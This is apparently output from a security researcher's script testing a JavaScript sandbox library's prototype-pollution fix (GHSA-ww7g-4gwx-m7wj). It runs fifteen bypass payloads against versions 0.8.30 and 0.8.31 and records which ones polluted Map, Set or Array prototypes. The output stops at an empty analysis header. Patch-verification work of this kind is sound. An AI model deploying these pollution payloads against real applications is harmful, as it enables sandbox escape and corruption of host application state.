============================================== GHSA-ww7g-4gwx-m7wj Variant Analysis Script Testing potential bypasses of the 0.8.31 fix ============================================== [INFO] Setting up test environment... [INFO] Installing vulnerable version 0.8.30... Wrote to /root/.pruva/runs/ghsa-ww7g-4gwx-m7wj_20260219-193042/vuln_variant/vuln_test/package.json: { "name": "vuln_test", "version": "1.0.0", "description": "", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, "keywords": [], "author": "", "license": "ISC" } npm audit fix Run `npm audit` for details. [INFO] Installing fixed version 0.8.31... Wrote to /root/.pruva/runs/ghsa-ww7g-4gwx-m7wj_20260219-193042/vuln_variant/fixed_test/package.json: { "name": "fixed_test", "version": "1.0.0", "description": "", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, "keywords": [], "author": "", "license": "ISC" } added 1 package, and audited 2 packages in 2s found 0 vulnerabilities ============================================== Running tests on VULNERABLE version (0.8.30) ============================================== Testing version: 0.8.30 [Test 1] Array literal with Map.prototype (original vulnerability) [Test 2] Object literal with Map.prototype property [Test 3] Nested array with prototype [Test 4] Array destructuring [Test 5] Spread operator [Test 6] Array concat [Test 7] Array slice [Test 8] Function constructor prototype [Test 9] Object.create with Map.prototype [Test 10] Class extending Map [Test 11] Set prototype via array [Test 12] Array prototype via array [Test 13] Object prototype via array [Test 14] Using .constructor.prototype [Test 15] Using __proto__ via array ---RESULTS--- { "version": "0.8.30", "tests": [ { "name": "Array literal Map.prototype", "code": "const arr = [Map.prototype]; arr[0]._test = \"pwned\"; return \"done\";", "error": null, "result": "done", "polluted": true, "blocked": null }, { "name": "Object literal Map.prototype", "code": "const obj = {p: Map.prototype}; obj.p._test = \"pwned\"; return \"done\";", "error": null, "result": "done", "polluted": true, "blocked": null }, { "name": "Nested array", "code": "const arr = [[Map.prototype]]; const p = arr[0][0]; p._test = \"pwned\"; return \"done\";", "error": null, "result": "done", "polluted": true, "blocked": null }, { "name": "Array destructuring", "code": "const [p] = [Map.prototype]; p._test = \"pwned\"; return \"done\";", "error": "Unexpected token 'const': const [p] = [Map.prototype]", "result": null, "polluted": false, "blocked": false }, { "name": "Spread operator", "code": "const arr = [...[Map.prototype]]; arr[0]._test = \"pwned\"; return \"done\";", "error": null, "result": "done", "polluted": true, "blocked": null }, { "name": "Array concat", "code": "const arr = [].concat([Map.prototype]); arr[0]._test = \"pwned\"; return \"done\";", "error": null, "result": "done", "polluted": true, "blocked": null }, { "name": "Array slice", "code": "const arr = [Map.prototype]; const p = arr.slice(0)[0]; p._test = \"pwned\"; return \"done\";", "error": null, "result": "done", "polluted": true, "blocked": null }, { "name": "Function constructor", "code": "function F(){}; F.prototype._test = \"pwned\"; const f = new F(); return f._test;", "error": "Static method or property access not permitted: sandboxedObject.prototype", "result": null, "polluted": false, "blocked": true }, { "name": "Object.create", "code": "const obj = Object.create(Map.prototype); obj._test = \"pwned\"; return \"done\";", "error": "Static method or property access not permitted: Object.create", "result": null, "polluted": false, "blocked": true }, { "name": "Class extends", "code": "class M extends Map {}; M.prototype._test = \"pwned\"; return \"done\";", "error": "Unexpected token 'class': class M extends Map {}", "result": null, "polluted": false, "blocked": false }, { "name": "Set prototype array", "code": "const arr = [Set.prototype]; arr[0]._test = \"pwned\"; return \"done\";", "error": null, "result": "done", "polluted": true, "blocked": null }, { "name": "Array prototype array", "code": "const arr = [Array.prototype]; arr[0]._test = \"pwned\"; return \"done\";", "error": null, "result": "done", "polluted": true, "blocked": null }, { "name": "Object prototype array", "code": "const arr = [Object.prototype]; arr[0]._test = \"pwned\"; return \"done\";", "error": "Static method or property access not permitted: Object.prototype", "result": null, "polluted": false, "blocked": true }, { "name": "Constructor.prototype", "code": "const arr = [new Map()]; const p = arr[0].constructor.prototype; p._test = \"pwned\"; return \"done\";", "error": "Cannot assign property '_test' of a global object", "result": null, "polluted": false, "blocked": false }, { "name": "__proto__ via array", "code": "const arr = [new Map()]; const p = arr[0].__proto__; p._test = \"pwned\"; return \"done\";", "error": "Method or property access not permitted: Object.__proto__", "result": null, "polluted": false, "blocked": true } ] } ============================================== Running tests on FIXED version (0.8.31) ============================================== Testing version: 0.8.31 [Test 1] Array literal with Map.prototype (original vulnerability) [Test 2] Object literal with Map.prototype property [Test 3] Nested array with prototype [Test 4] Array destructuring [Test 5] Spread operator [Test 6] Array concat [Test 7] Array slice [Test 8] Function constructor prototype [Test 9] Object.create with Map.prototype [Test 10] Class extending Map [Test 11] Set prototype via array [Test 12] Array prototype via array [Test 13] Object prototype via array [Test 14] Using .constructor.prototype [Test 15] Using __proto__ via array ---RESULTS--- { "version": "0.8.31", "tests": [ { "name": "Array literal Map.prototype", "code": "const arr = [Map.prototype]; arr[0]._test = \"pwned\"; return \"done\";", "error": "Access to prototype of global object is not permitted", "result": null, "polluted": false, "blocked": true }, { "name": "Object literal Map.prototype", "code": "const obj = {p: Map.prototype}; obj.p._test = \"pwned\"; return \"done\";", "error": "Access to prototype of global object is not permitted", "result": null, "polluted": false, "blocked": true }, { "name": "Nested array", "code": "const arr = [[Map.prototype]]; const p = arr[0][0]; p._test = \"pwned\"; return \"done\";", "error": "Access to prototype of global object is not permitted", "result": null, "polluted": false, "blocked": true }, { "name": "Array destructuring", "code": "const [p] = [Map.prototype]; p._test = \"pwned\"; return \"done\";", "error": "Unexpected token 'const': const [p] = [Map.prototype]", "result": null, "polluted": false, "blocked": false }, { "name": "Spread operator", "code": "const arr = [...[Map.prototype]]; arr[0]._test = \"pwned\"; return \"done\";", "error": "Access to prototype of global object is not permitted", "result": null, "polluted": false, "blocked": true }, { "name": "Array concat", "code": "const arr = [].concat([Map.prototype]); arr[0]._test = \"pwned\"; return \"done\";", "error": "Access to prototype of global object is not permitted", "result": null, "polluted": false, "blocked": true }, { "name": "Array slice", "code": "const arr = [Map.prototype]; const p = arr.slice(0)[0]; p._test = \"pwned\"; return \"done\";", "error": "Access to prototype of global object is not permitted", "result": null, "polluted": false, "blocked": true }, { "name": "Function constructor", "code": "function F(){}; F.prototype._test = \"pwned\"; const f = new F(); return f._test;", "error": null, "result": "pwned", "polluted": false, "blocked": null }, { "name": "Object.create", "code": "const obj = Object.create(Map.prototype); obj._test = \"pwned\"; return \"done\";", "error": "Static method or property access not permitted: Object.create", "result": null, "polluted": false, "blocked": true }, { "name": "Class extends", "code": "class M extends Map {}; M.prototype._test = \"pwned\"; return \"done\";", "error": "Unexpected token 'class': class M extends Map {}", "result": null, "polluted": false, "blocked": false }, { "name": "Set prototype array", "code": "const arr = [Set.prototype]; arr[0]._test = \"pwned\"; return \"done\";", "error": "Access to prototype of global object is not permitted", "result": null, "polluted": false, "blocked": true }, { "name": "Array prototype array", "code": "const arr = [Array.prototype]; arr[0]._test = \"pwned\"; return \"done\";", "error": "Access to prototype of global object is not permitted", "result": null, "polluted": false, "blocked": true }, { "name": "Object prototype array", "code": "const arr = [Object.prototype]; arr[0]._test = \"pwned\"; return \"done\";", "error": "Static method or property access not permitted: Object.prototype", "result": null, "polluted": false, "blocked": true }, { "name": "Constructor.prototype", "code": "const arr = [new Map()]; const p = arr[0].constructor.prototype; p._test = \"pwned\"; return \"done\";", "error": "Access to prototype of global object is not permitted", "result": null, "polluted": false, "blocked": true }, { "name": "__proto__ via array", "code": "const arr = [new Map()]; const p = arr[0].__proto__; p._test = \"pwned\"; return \"done\";", "error": "Access to prototype of global object is not permitted", "result": null, "polluted": false, "blocked": true } ] } ============================================== ANALYSIS RESULTS ==============================================